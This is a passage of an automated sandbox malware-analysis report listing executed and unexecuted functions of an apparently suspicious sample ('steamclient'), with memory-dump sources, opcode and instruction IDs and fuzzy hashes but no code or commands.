                                                                    • API String ID:
                                                                    • Opcode ID: cefbd945cdcc692a558259ccaf8604edc1f69396cb6a4553dc094f7af080fa2c
                                                                    • Instruction ID: 548126e55e91266442f46a512887ed2062114000059ddb6bd3bc077f7605ab23
                                                                    • Opcode Fuzzy Hash: cefbd945cdcc692a558259ccaf8604edc1f69396cb6a4553dc094f7af080fa2c
                                                                    • Instruction Fuzzy Hash: 1B41E671A18A8D8FDB45EB68C8657E9BFB1FF59300F0502AAD149D72A6DE782401C741
                                                                    Function 00007FFD9B8912B0 Relevance: .1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dc75a11204b9d46ef108f964b06031b9a34a3082e0aea90861c2a6cb0af140b4
                                                                    • Instruction ID: 1598972c90f9a02ed3e6d8d27477f5121746135168baeabb51ec8944d7b47dee
                                                                    • Opcode Fuzzy Hash: dc75a11204b9d46ef108f964b06031b9a34a3082e0aea90861c2a6cb0af140b4
                                                                    • Instruction Fuzzy Hash: 1931D711B1C9294FE758B76C786A6B977C2DF88365F0541BBE40EC32EBDC18AC424285
                                                                    Function 00007FFD9B890830 Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 06be8c6ff68ec1b01daec10dbad9cc3ec8f400d811fdacc0dd7bab7009250d4f
                                                                    • Instruction ID: 57d86e2c4c2ca3cb8d784209193783456073d3ec0e26c5c287ba8c3776f65778
                                                                    • Opcode Fuzzy Hash: 06be8c6ff68ec1b01daec10dbad9cc3ec8f400d811fdacc0dd7bab7009250d4f
                                                                    • Instruction Fuzzy Hash: 4B214C33B1D3A84EDB21AB6C9C694FB7FA0FF49625F01027BE0D5D6193DA2490468391
                                                                    Function 00007FFD9B8912E8 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7cfcdffece06abea21b5330de78fe4b6894904c5df15419daedfc7390cb384db
                                                                    • Instruction ID: 4938a41fce16209686adff80063c57f8fc0758bd8df1e2b952505edff63a4ed3
                                                                    • Opcode Fuzzy Hash: 7cfcdffece06abea21b5330de78fe4b6894904c5df15419daedfc7390cb384db
                                                                    • Instruction Fuzzy Hash: AB21F920B1C91D1FEB98F76C5869679B6C7EB9C351F4101B9E40EC32EADD14AC414285
                                                                    Function 00007FFD9B89155D Relevance: .1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7a3d9490771fd23dd38e8726ebd7d197e984a5a6596a741b4a15ad3c01a2574c
                                                                    • Instruction ID: fb4e5baa75f0579af7cadf9672a3016f5028e579d279abde00620b9bb36933b5
                                                                    • Opcode Fuzzy Hash: 7a3d9490771fd23dd38e8726ebd7d197e984a5a6596a741b4a15ad3c01a2574c
                                                                    • Instruction Fuzzy Hash: 07210332B0E66D9FDB02BBA8EC141CCBB70EF52322F0541B3C114C7182E920561AC790
                                                                    Function 00007FFD9B891852 Relevance: .1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2cf6085794e59c5b3e35f277313d9d15433b5c2a51eaf12139c59f9e68586c30
                                                                    • Instruction ID: eed4ff818647b5ee5f0e1a5ea057c6f9132eca86bce5b432af04610567bbe71c
                                                                    • Opcode Fuzzy Hash: 2cf6085794e59c5b3e35f277313d9d15433b5c2a51eaf12139c59f9e68586c30
                                                                    • Instruction Fuzzy Hash: 80219161A08A898BFB589B5CE8693E57FD1FB59314F50027ED00AD72A6DFFC24018381
                                                                    Function 00007FFD9B891588 Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c0f2289a86d0282adf7e00dbad79c1d13998c107acec87888024311dc123226
                                                                    • Instruction ID: 39a3e78544eb8e44768cf849ad7394709d370781ec9fb795d29ee56e8240265a
                                                                    • Opcode Fuzzy Hash: 1c0f2289a86d0282adf7e00dbad79c1d13998c107acec87888024311dc123226
                                                                    • Instruction Fuzzy Hash: E611A331B0D75D9FDB02FBB8D81018CBBB0EF46311F1541B3D050C7192E53456198781
                                                                    Function 00007FFD9B891590 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9483a7b69fffcd23bd445004c9ad206d39cd204aec25c1da0ed1c19dd099bfd5
                                                                    • Instruction ID: c2be6371a092ba8e64bae30b61c850139b26af0101c25a4987997298781cecd8
                                                                    • Opcode Fuzzy Hash: 9483a7b69fffcd23bd445004c9ad206d39cd204aec25c1da0ed1c19dd099bfd5
                                                                    • Instruction Fuzzy Hash: A4018E31B0E6999FDB02EBA4C86059DBBB0EF06310F1541A3D055CB292E934A6498741
                                                                    Function 00007FFD9B891598 Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c26c9c9c72450be69537c1c04289ecb65cee49ae24b30f7e62e8547c1e22505
                                                                    • Instruction ID: ee0f965d05d77f3c714eeaa57dc784a6c900ba89962e8d7bb845d3e1177c8504
                                                                    • Opcode Fuzzy Hash: 9c26c9c9c72450be69537c1c04289ecb65cee49ae24b30f7e62e8547c1e22505
                                                                    • Instruction Fuzzy Hash: 49019E31A0E38DAFDB12EBB4C86059DBFB0EF06310F1941E7D045CB292E934A649C741
                                                                    Function 00007FFD9B893F20 Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2265d205e7fe907bd3ad498537c7b7cc89f1aac46e5084fa8caa28c017fe2116
                                                                    • Instruction ID: 6571d99a15dd2be4f2b8580bcc872c28fa95e94bae4d8007e15fe24789326fb9
                                                                    • Opcode Fuzzy Hash: 2265d205e7fe907bd3ad498537c7b7cc89f1aac46e5084fa8caa28c017fe2116
                                                                    • Instruction Fuzzy Hash: DD012135A1891DCFDF68EB58C8919ADB7E1FB9C310F510269D00AD72A5CE34A901CFC1
                                                                    Function 00007FFD9B8915A0 Relevance: .0, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d6948c586d05a00d95bbeff93d51a4e7b2e9cf511d2e0bc643f0a95992ee70d
                                                                    • Instruction ID: 60ddbeb16ad0c9d6cc8269a9480c6a95fb12005cb09609f80a3627ceb1cbfa84
                                                                    • Opcode Fuzzy Hash: 8d6948c586d05a00d95bbeff93d51a4e7b2e9cf511d2e0bc643f0a95992ee70d
                                                                    • Instruction Fuzzy Hash: 32014F31E0E389AFDB12EBB4886459D7FB0AF06314F1941E7D045DB2A6E938AA44C741
                                                                    Function 00007FFD9B8957AF Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ceaa50d4aa67770186724bc6618f0c841c2af3e7bd88d1a09b355e4eefac0e65
                                                                    • Instruction ID: c64b0f74620971fa07e4ef12e526c3349e8da8090a6b02092a101c604be79c3c
                                                                    • Opcode Fuzzy Hash: ceaa50d4aa67770186724bc6618f0c841c2af3e7bd88d1a09b355e4eefac0e65
                                                                    • Instruction Fuzzy Hash: 7DF03970A0D21E5BEBA9A2849861BE82760EF49300F5180B4DA4ED32E1CE38AE418795
                                                                    Function 00007FFD9B89070D Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc0334c7094df0a661d5559b226acf2629164723c98b833ffa45cb21d0c9e900
                                                                    • Instruction ID: 4678e654c367e333ab879e67d4ea87506e5f3171566379e8daf5d2bcdc3e4daf
                                                                    • Opcode Fuzzy Hash: fc0334c7094df0a661d5559b226acf2629164723c98b833ffa45cb21d0c9e900
                                                                    • Instruction Fuzzy Hash: 68D0EC05F6F51F51ED7533F928664BC79409F8CB24FD70572D40C800DAAC4E26951553
                                                                    Function 00007FFD9B891BB0 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5aed10bb81f0f6b705e8d924a26448956ffa6ad39147f1e80df6d8165d9fa489
                                                                    • Instruction ID: 2d2c215516f4cb1e8965f11d94fccc9d0c7cc00a4c03876fe19e928d8f4dec84
                                                                    • Opcode Fuzzy Hash: 5aed10bb81f0f6b705e8d924a26448956ffa6ad39147f1e80df6d8165d9fa489
                                                                    • Instruction Fuzzy Hash: B6C0123061180C8FCE48EB28C8A4D1477A0FB1D304B9A0094E00ECB2B1E62AECC2CB40
                                                                    Function 00007FFD9B890730 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002A.00000002.3110951576.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_42_2_7ffd9b890000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 88a0c4741b636eb5f01c4778584042cc197c8b71ee4301ca202ebb54c21d0eff
                                                                    • Instruction ID: 5ac7527d2174f690ebb45c5eedb3e33eba02931d9c8abc9d0475bd0e4726ceb9
                                                                    • Opcode Fuzzy Hash: 88a0c4741b636eb5f01c4778584042cc197c8b71ee4301ca202ebb54c21d0eff
                                                                    • Instruction Fuzzy Hash: BBB01200E9F40F00DC3433F5085606478009B8C200FC20570E408800D5DC4D12940242

                                                                    Executed Functions

                                                                    Function 00007FFD9B8A0A19 Relevance: .3, Instructions: 283COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b68a981198abb17890c80025455cfe1d7479d54879cc7ab6df719dd3a0285995
                                                                    • Instruction ID: 958cc97d9d1b52868aaa4f849a63009e66509d7a9c4ee9cd2037e4ffc908a9ed
                                                                    • Opcode Fuzzy Hash: b68a981198abb17890c80025455cfe1d7479d54879cc7ab6df719dd3a0285995
                                                                    • Instruction Fuzzy Hash: 67713811F2EA4D0AE76866BC08652B976C2DF89B15F26027DE4DFC32E7EC1C69074251
                                                                    Function 00007FFD9B8A07C5 Relevance: .2, Instructions: 235COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86458abccbb630b8baa8f9397a3679637113d7c6f73ef92c3f4be35b326498d7
                                                                    • Instruction ID: 40e7b606a34cd68728edbf93d284e46d4c917c1b0287887558b6c97c9e79317d
                                                                    • Opcode Fuzzy Hash: 86458abccbb630b8baa8f9397a3679637113d7c6f73ef92c3f4be35b326498d7
                                                                    • Instruction Fuzzy Hash: 33618932B1E65C8FE765EB6C98956F97BE0FF48710B05017BE09DC72A3DE2498028791
                                                                    Function 00007FFD9B8A16C8 Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8bb07072d919bd109e457dfdd43cc51f3536cbaf6196b44ea8be797f6540b3c2
                                                                    • Instruction ID: 6715d3b866b68f2018d1971c4ce47c79ff27498cc3ee24f14060c0a6727e09b7
                                                                    • Opcode Fuzzy Hash: 8bb07072d919bd109e457dfdd43cc51f3536cbaf6196b44ea8be797f6540b3c2
                                                                    • Instruction Fuzzy Hash: D141E472A19A8C8FD745EB68C8697A8BBB1FF59300F4502AAD149C72E2DF782401C741
                                                                    Function 00007FFD9B8A07FA Relevance: .1, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 936aa9184ce3f8beb496153b75fe6ec8927dbfbfac6d7fb17eb3316c3a5b36c0
                                                                    • Instruction ID: 4e9d1f2a1b8c685c408a9acfed6ded5ab60826b0dacbb3dce217cada5c0a9103
                                                                    • Opcode Fuzzy Hash: 936aa9184ce3f8beb496153b75fe6ec8927dbfbfac6d7fb17eb3316c3a5b36c0
                                                                    • Instruction Fuzzy Hash: FE315E32B1E6AC4FD321AB6CACA54FA7BA0EF49629B05027BE0DDC71A3ED14504743D1
                                                                    Function 00007FFD9B8A12B0 Relevance: .1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6211205728dbe3a303ac585f3ab881738af1278a2162df46a7dab5c9c430f8fe
                                                                    • Instruction ID: 4be9cb506beba1c63bfb728052316301295bf154eee0f18d270ab4bcc7ff2841
                                                                    • Opcode Fuzzy Hash: 6211205728dbe3a303ac585f3ab881738af1278a2162df46a7dab5c9c430f8fe
                                                                    • Instruction Fuzzy Hash: AC310421B0C92D4FE358B7AC786A6F873C1DF89365B5101BBE00EC32E7DC18AC424285
                                                                    Function 00007FFD9B8A0830 Relevance: .1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad1ab9ada2ddf51fc306c743738af77387aacc1bc7bef10a3279c6bb33b0de9b
                                                                    • Instruction ID: 0360209e1701adf244cff52808af0bbc0501e734238cfc1d02654fe1d71889b8
                                                                    • Opcode Fuzzy Hash: ad1ab9ada2ddf51fc306c743738af77387aacc1bc7bef10a3279c6bb33b0de9b
                                                                    • Instruction Fuzzy Hash: 68214E32B1E6AC4ED721AB6C9C994FA7BA0FF49625B05027BE0D9C3192EE2451424391
                                                                    Function 00007FFD9B8A12E8 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e5022f5f23871789ee4b3b22434a270da2bde52ff7b34cf782fc2ff7ea3d67c2
                                                                    • Instruction ID: bf21acbd973d4b7af7e3ca8b801204c7747b4144acca224cf573300fa5c134ae
                                                                    • Opcode Fuzzy Hash: e5022f5f23871789ee4b3b22434a270da2bde52ff7b34cf782fc2ff7ea3d67c2
                                                                    • Instruction Fuzzy Hash: 4921F620B1991D0FE798FB6C986A6B976C6EB9D351F5100B9E40EC32F6DD28AC418291
                                                                    Function 00007FFD9B8A155D Relevance: .1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2efa05ae9b96ec837d44d02bb9c00b77618f59b5bbb74feac302e76e88f7bbf3
                                                                    • Instruction ID: 0888d73542f90b1dd6443474804301b92ef7cc474e18a237a04de1fbe5606660
                                                                    • Opcode Fuzzy Hash: 2efa05ae9b96ec837d44d02bb9c00b77618f59b5bbb74feac302e76e88f7bbf3
                                                                    • Instruction Fuzzy Hash: 1721F536B0A65D8FD702BBB8EC250D9BB70EF52322F1543F3D054C7182E924561AC791
                                                                    Function 00007FFD9B8A1852 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eab2ea97383927f369a226e594f001bed16626dfc1fdeaa151538c2ae54960af
                                                                    • Instruction ID: 9afa548a41cd22377cddfd858eb186eae878153b1bf9f950dd05ece00ea52ab3
                                                                    • Opcode Fuzzy Hash: eab2ea97383927f369a226e594f001bed16626dfc1fdeaa151538c2ae54960af
                                                                    • Instruction Fuzzy Hash: EF21A161A18A898BF748DF5CE8697E5BBD1EB15304F9042BEE009D72E6DFFC24018742
                                                                    Function 00007FFD9B8A1588 Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c5293f23669ba16b6cb03b5f4be691d1789739b8a0ad7c865ea19b6042ead72a
                                                                    • Instruction ID: 3b5e710f4c1f445fca38e644c806ffe37d9fe54b9260c8ed725469218cfb39e1
                                                                    • Opcode Fuzzy Hash: c5293f23669ba16b6cb03b5f4be691d1789739b8a0ad7c865ea19b6042ead72a
                                                                    • Instruction Fuzzy Hash: F811A035B0A78D8FD702FBB8D820198BBB0EF06311F1942E3D054CB292EA34A61AC751
                                                                    Function 00007FFD9B8A1590 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 78cc6f62dca5cfe1bccda4ff1df7ec8e12c97ca8d9cdb1b7699eda82bfd782c9
                                                                    • Instruction ID: 4baceaeaefa1729c2e7e9e25d6f5e58e2845b8429434bd1997d228cd07aa3c09
                                                                    • Opcode Fuzzy Hash: 78cc6f62dca5cfe1bccda4ff1df7ec8e12c97ca8d9cdb1b7699eda82bfd782c9
                                                                    • Instruction Fuzzy Hash: 5901AD35B0A78D9FD702EBB8C860599BBB0EF06311F1982E3D054CB292EA34A649C751
                                                                    Function 00007FFD9B8A1598 Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b8ecee8a65acbcbb171aec98bc69f706b80aa23ddac99aa108679c59320c5db
                                                                    • Instruction ID: c2b8089ed588cd5fea7011c52055149203560fd622bf928b552c071e4e4ad54f
                                                                    • Opcode Fuzzy Hash: 6b8ecee8a65acbcbb171aec98bc69f706b80aa23ddac99aa108679c59320c5db
                                                                    • Instruction Fuzzy Hash: 4B019E31A0E38D9FD712EBF4C86459DBBB0EF06310F1942E3D045CB292E938A649C751
                                                                    Function 00007FFD9B8A3F20 Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 90b02d820f0ae5e3871800d6cf4f7fa2f48e2ac8878632b5763422d9915ab6c3
                                                                    • Instruction ID: 96d423efa348bfa84d8d2e659cbede8475ec71beb57f038d0490e7a4a1192a15
                                                                    • Opcode Fuzzy Hash: 90b02d820f0ae5e3871800d6cf4f7fa2f48e2ac8878632b5763422d9915ab6c3
                                                                    • Instruction Fuzzy Hash: 8A012135A1891CCFDB64EB58C8919AD73A1FBAC300F514169D00ED72A5DA78A901CFD1
                                                                    Function 00007FFD9B8A15A0 Relevance: .0, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f66f630a595bae79b9ae9afbf2d3c316622a99fdfeede5304de6e92520adc692
                                                                    • Instruction ID: d27343599a0d3d0fdce63c3b936d8626eb08d8ccf15ef97dd632ff37c9174196
                                                                    • Opcode Fuzzy Hash: f66f630a595bae79b9ae9afbf2d3c316622a99fdfeede5304de6e92520adc692
                                                                    • Instruction Fuzzy Hash: 36012C35A0E2899FD712EBF4886459D7BB0AF06314F1941E3D045DB2A6E938AA44C751
                                                                    Function 00007FFD9B8A57AF Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ceaa50d4aa67770186724bc6618f0c841c2af3e7bd88d1a09b355e4eefac0e65
                                                                    • Instruction ID: 6dea3e352a0a79e5cea6bc9455d892dd68360b29582c2dd5c6e2608c9df1e7ee
                                                                    • Opcode Fuzzy Hash: ceaa50d4aa67770186724bc6618f0c841c2af3e7bd88d1a09b355e4eefac0e65
                                                                    • Instruction Fuzzy Hash: A6F03070A0D11E47EBA5A2848871BE82360EF4A300F1180B4D64DD32E1DE389E41C765
                                                                    Function 00007FFD9B8A070D Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
